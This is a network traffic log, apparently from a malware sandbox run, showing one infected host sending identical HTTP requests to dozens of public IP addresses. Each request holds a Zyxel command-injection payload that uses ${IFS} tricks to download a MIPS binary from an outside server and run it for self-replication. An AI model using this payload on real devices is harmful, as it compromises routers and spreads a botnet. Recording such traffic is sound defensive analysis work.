                                      Jan 14, 2024 15:50:43.226119995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3592192.168.2.1437458150.70.183.100443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.226171970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3593192.168.2.143755042.114.82.201443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.226205111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3594192.168.2.1441334151.139.6.181443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.226289988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3595192.168.2.145732676.129.216.32443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.226336956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3596192.168.2.1456096187.57.109.251443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.226378918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3597192.168.2.143761465.32.62.26443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.226454973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3598192.168.2.145303485.35.136.64443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.226504087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3599192.168.2.1455468175.45.136.21443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.226572990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3600192.168.2.1437816220.252.174.221443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.226639032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3601192.168.2.143637648.208.159.155443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.226691008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3602192.168.2.1456586190.244.98.21443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.226736069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3603192.168.2.1458764142.54.116.172443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.226790905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3604192.168.2.145398288.153.196.79443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.226857901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3605192.168.2.145262240.9.62.247443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.226907969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3606192.168.2.1450184115.194.163.72443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.226950884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3607192.168.2.143429814.230.195.41443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.226994991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3608192.168.2.1459526164.199.146.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.227067947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3609192.168.2.1450580157.221.71.3443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.227118969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3610192.168.2.144950851.6.147.146443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.227174997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3611192.168.2.144286442.234.79.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.227230072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3612192.168.2.143772476.85.172.197443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.227277994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3613192.168.2.1448164129.194.65.142443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.227313995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3614192.168.2.1443914173.112.197.225443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.227382898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3615192.168.2.1457020205.28.212.228443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.227416039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3616192.168.2.145493625.195.144.210443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.227492094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3617192.168.2.1454052217.36.71.124443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.227538109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3618192.168.2.1434574179.85.111.254443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.227581978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3619192.168.2.1440988164.106.157.237443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.227669001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3620192.168.2.143921625.50.85.32443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.227710009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3621192.168.2.1444238136.115.243.217443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.227772951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3622192.168.2.1449544111.192.129.195443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.227818966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3623192.168.2.143656282.142.3.235443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.227874041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3624192.168.2.1439742211.135.33.122443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.227930069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3625192.168.2.1448738126.215.156.174443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.227998018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3626192.168.2.1438980222.146.75.79443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.228051901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3627192.168.2.143460438.34.15.181443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.228108883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3628192.168.2.144176261.54.103.139443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.228161097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3629192.168.2.145458639.94.110.111443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.228198051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3630192.168.2.1435504203.223.16.156443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.228247881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3631192.168.2.145314493.201.32.19443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.228307009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3632192.168.2.144415889.115.227.25443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.228343010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3633192.168.2.143707051.190.7.98443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.228427887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3634192.168.2.1451092185.54.161.143443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.228460073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3635192.168.2.1448492155.0.161.2443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.228497028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3636192.168.2.143734619.196.9.219443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.228553057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3637192.168.2.1435476184.48.188.249443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.228584051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3638192.168.2.1435706182.182.236.100443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.228665113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3639192.168.2.1452836182.97.229.152443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.228705883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3640192.168.2.1439904194.58.228.142443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.228775024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3641192.168.2.144395812.150.116.61443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.228826046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3642192.168.2.145992837.31.96.61443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.228864908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3643192.168.2.1453280184.81.43.159443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.228913069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3644192.168.2.1436944151.94.86.150443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.228971958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3645192.168.2.143701643.244.119.243443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.229007959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3646192.168.2.145323662.90.191.195443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.229037046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3647192.168.2.1442712170.66.17.108443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.229084969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3648192.168.2.1447230197.211.206.45443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.229136944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3649192.168.2.1453194183.232.97.143443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.229195118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3650192.168.2.1450218192.46.109.159443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.229233027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3651192.168.2.143698052.62.60.237443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.229271889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3652192.168.2.1449776160.41.230.187443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.229315996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3653192.168.2.144931093.211.66.36443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.229382992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3654192.168.2.1434064159.11.162.174443
                                      TimestampBytes transferredDirectionData
